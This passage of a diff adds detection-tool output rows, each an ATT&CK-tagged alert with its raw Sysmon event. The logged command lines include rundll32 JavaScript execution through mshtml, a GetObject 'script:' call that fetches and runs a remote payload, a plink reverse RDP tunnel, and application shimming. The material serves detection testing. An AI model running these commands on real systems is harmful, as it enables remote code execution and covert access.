+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
+    <Data Name=""ProcessId"">1004</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
+    <Data Name=""ParentProcessId"">1808</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
+    </TimeCreated>
+    <EventRecordID>4977</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
+    <Data Name=""ProcessId"">1004</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
+    <Data Name=""ParentProcessId"">1808</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:58:20.994444Z"">
+    </TimeCreated>
+    <EventRecordID>1966480</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:58:20.894</Data>
+    <Data Name=""ProcessGuid"">365ABB72-57EC-5C91-0000-001097810900</Data>
+    <Data Name=""ProcessId"">2848</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Users\user01\Desktop\titi.sdb&quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\user01\Desktop\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:15.226408Z"">
+    </TimeCreated>
+    <EventRecordID>4975</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:15.202</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
+    <Data Name=""ProcessId"">1808</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:52:47.474867Z"">
+    </TimeCreated>
+    <EventRecordID>1966464</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:52:47.364</Data>
+    <Data Name=""ProcessGuid"">365ABB72-569F-5C91-0000-0010D96C0800</Data>
+    <Data Name=""ProcessId"">3140</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe  10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-16T10:02:21.934438Z"">
+    </TimeCreated>
+    <EventRecordID>1940899</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1728"" ThreadID=""412"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-02-16 10:02:21.934</Data>
+    <Data Name=""ProcessGuid"">365ABB72-DFAD-5C67-0000-0010E0811500</Data>
+    <Data Name=""ProcessId"">2312</Data>
+    <Data Name=""Image"">C:\Users\IEUser\Desktop\plink.exe</Data>
+    <Data Name=""FileVersion"">Release 0.70</Data>
+    <Data Name=""Description"">Command-line SSH, Telnet, and Rlogin client</Data>
+    <Data Name=""Product"">PuTTY suite</Data>
+    <Data Name=""Company"">Simon Tatham</Data>
+    <Data Name=""CommandLine"">plink.exe  10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">PC01\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-D6AB-5C67-0000-002056660200</Data>
+    <Data Name=""LogonId"">0x26656</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-D92A-5C67-0000-0010CB580900</Data>
+    <Data Name=""ParentProcessId"">3904</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;))",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
+    </TimeCreated>
+    <EventRecordID>4971</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
+    <Data Name=""ProcessId"">348</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
+    <Data Name=""ParentProcessId"">5844</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
+    </TimeCreated>
+    <EventRecordID>4971</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
+    <Data Name=""ProcessId"">348</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
+    <Data Name=""ParentProcessId"">5844</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
+    </TimeCreated>
+    <EventRecordID>4971</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
+    <Data Name=""ProcessId"">348</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
+    <Data Name=""ParentProcessId"">5844</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:34:10.373481Z"">
+    </TimeCreated>
+    <EventRecordID>4969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:34:10.292</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
